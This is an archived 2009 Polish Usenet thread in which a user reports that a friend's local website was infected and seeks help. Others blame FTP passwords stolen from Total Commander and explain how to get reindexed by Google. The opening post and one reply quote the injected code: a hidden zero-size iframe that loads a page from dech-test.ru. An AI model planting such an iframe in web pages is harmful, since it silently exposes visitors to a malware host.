Discussion:
Czy koledze kto¶ siê dobra³ do strony internetowej, czy przypadek ?
(Wiadomość utworzona zbyt dawno temu. Odpowiedź niemożliwa.)
Marek
2009-11-12 19:43:42 UTC
Permalink
Kolega ma dośc poluparną (widoczną w pierwszych 10 wynikach po podaniu w
google nazwy miejscowości) stronę o tematyce lokalnej. Niee stosował
żadnych technik pozycjonowania, strona po prostu była w tych pierwszych
wynikach. Strona jest w domenie republika.pl

Może 2 tygodnie temu do pliku index.htm dopisało się coś takiego:

<iframe frameborder=”0” onload=”if ( !this.src )
{his.src=`http://dech-test.ru:8080/index.php` ;his.height=`0`
;his.width=`0` ; } „> oshgyabonrgnhabcfwmzyeescghelzi</iframe>

Wymienił plik index.htmna właściwy a ten kod sie znowu przykleił.

Jednocześńie miał wirusa PWS, Win 32 / Daurso. A , "coś/ktoś ? " mu ruszalo
myszką po ekranie.

Traktować to jako włamanie + celowe działanie ( ktoś przejął hasła i
pobawił się kontem ?)czy przypadkowy zbieg okoliczności ? Jednocześńie z
pojawieniem się tego kody w index.htm strona wyparowała z wyników google.
Wpisanie do wyszukiwarki site:strona.pl daje jedną odpowiedź o kilku
odwiedzinach.

Byłbym, wdzięczy za pomoc lub właściwego fut-a.
Marek
Konrad Stepien
2009-11-12 20:18:54 UTC
Permalink
Kolega ma doúc poluparnŕ (widocznŕ w pierwszych 10 wynikach po podaniu w
google nazwy miejscowoúci) stronć o tematyce lokalnej. Niee stosowaů
ýadnych technik pozycjonowania, strona po prostu byůa w tych pierwszych
wynikach. Strona jest w domenie republika.pl
To akurat w przedmiotowej sprawie chyba nie ma znaczenia.
<iframe frameborder=Ą0Ą onload=Ąif ( !this.src )
{his.src=`http://dech-test.ru:8080/index.php` ;his.height=`0`
;his.width=`0` ; } Ľ> oshgyabonrgnhabcfwmzyeescghelzi</iframe>
Wymieniů plik index.htmna wůaúciwy a ten kod sie znowu przykleiů.
Jednoczeúńie miaů wirusa PWS, Win 32 / Daurso. A , "coú/ktoú ? " mu ruszalo
myszkŕ po ekranie.
Taaa, znaczy miał u siebie pewnie niezłą "wylęgarnię".
I pewnie, podobnie jak prawie wszyscy miał w kliencie ftp zaklikane
"zapamiętaj hasło".
Traktowaă to jako wůamanie + celowe dziaůanie ( ktoú przejŕů hasůa i
pobawiů sić kontem ?)czy przypadkowy zbieg okolicznoúci ? Jednoczeúńie z
pojawieniem sić tego kody w index.htm strona wyparowaůa z wyników google.
Wpisanie do wyszukiwarki site:strona.pl daje jednŕ odpowiedę o kilku
odwiedzinach.
Włamanie - jak najbardziej, tyle, że nie na serwer a na jego komputer -
połączone z "wyciekiem" hasła. A dalej to "legalna" - bo przy pomocy
oficjalnego loginu i hasła - modyfikacja strony.
Przy czym żadna celowa dziłalność. Ot trafiło na niego, podobnie jak
na parę(dzisięt/set) tysięcy innych. Bo takie "włamy" to robi automat.

To bardzo częsty ostatnio scenariusz. Mam takch u siebie co paranaście dni.
Najpierw wielki lament że "się włamali", w logach ftp-a poprawne logowanie,
tyle, że z egzotycznego adresu i dalej jaaaaazda po wszystkich plikach.
Oczywiście, po przyciśnięciu klienta okazuje się, że oczywiście miał
"jakiegoś wirusa".

Ot, po prostu, od jakiegoś czasu wirusy to nie jest "sztuka dla sztuki"
tylko poważny biznes "e-marketingowy".

A wniosek z tego taki, że jak ktoś jest webmasterem (w sensie, że ma
uprawnienia do modyfikowania strony), to bezpieczeństwo jego komputera
jest równie istotne jak bezpieczeństwo serwera na którym strona stoi.
--
WARNING: my e-mail is encrypted by ROT13
Xbaenq Fgrcvra <***@vagreqngn.arg.cy>
Michaù Dziwisz
2009-11-12 20:12:16 UTC
Permalink
A kolega zapisywał sobie hasło do konta FTP w jakimś menedżerze plików?
Bo jeśli tak, to prawdopodobnie coś mu je przechwyciło, znajomemu
ostatnio tak zasyfiło stronę do tego stopnia, że znalazła się na czarnej
liście witryn, przed wejściem na które ostrzega np. Firefox. Na
pocieszenie, jeśli moje przypuszczenia są słuszne, to z pewnością nie
było celowe działanie wymierzone akurat w stronę Twojego kolegi, ot po
prostu automat. ;)
--
Pozdrawiam, Michał
Marek
2009-11-12 21:40:18 UTC
Permalink
Post by Michaù Dziwisz
A kolega zapisywał sobie hasło do konta FTP w jakimś menedżerze plików?
Bo jeśli tak, to prawdopodobnie coś mu je przechwyciło, znajomemu
ostatnio tak zasyfiło stronę do tego stopnia, że znalazła się na czarnej
liście witryn, przed wejściem na które ostrzega np. Firefox. Na
pocieszenie, jeśli moje przypuszczenia są słuszne, to z pewnością nie
było celowe działanie wymierzone akurat w stronę Twojego kolegi, ot po
prostu automat. ;)
total commander :)
teraz kluczowy problem: jak odkręcić w google ?
art3c
2009-11-14 21:26:32 UTC
Permalink
Post by Marek
total commander :)
teraz kluczowy problem: jak odkręcić w google ?
Na pewno TC. Mnie też załatwili jedną stronę: jak się okazało TC
"szyfruje" hasła nie lepiej niż GG. Co do odkręcenie to pozostaje
chyba tylko napisać do ich supportu i wykazać, że strona jest
bezpieczna ;)
Peter
2009-11-17 16:47:30 UTC
Permalink
Post by art3c
Post by Marek
total commander :)
teraz kluczowy problem: jak odkręcić w google ?
Na pewno TC. Mnie też załatwili jedną stronę: jak się okazało TC
"szyfruje" hasła nie lepiej niż GG. Co do odkręcenie to pozostaje
chyba tylko napisać do ich supportu i wykazać, że strona jest
bezpieczna ;)
Odkręcić można w prosty sposób w ciągu kilku dni.
Należy najpierw zarejestrować się w Google, potem w centrum dla
webmasterów dopisać stronę do swojego konta. Następnie zrobić
weryfikację, przez umieszczenie specjalnego tagu w tresci strony lub
umieszczenie pliku o odpowiedniej nazwie na serwerze. Po weryfikacji
będziesz mógł zgłosić ponowne zaindeksowanie strony. Oczywiście musisz
poprawić kod na stronie.

Miałem kilkanaście takich przypadków z zainfekowaniem kilku serwerów
jednocześnie. Przyczyna tkwiła w TC. Teraz używam FileZilli i problemy
się skończyły.

Peter

Kontynuuj czytanie narkive:
Loading...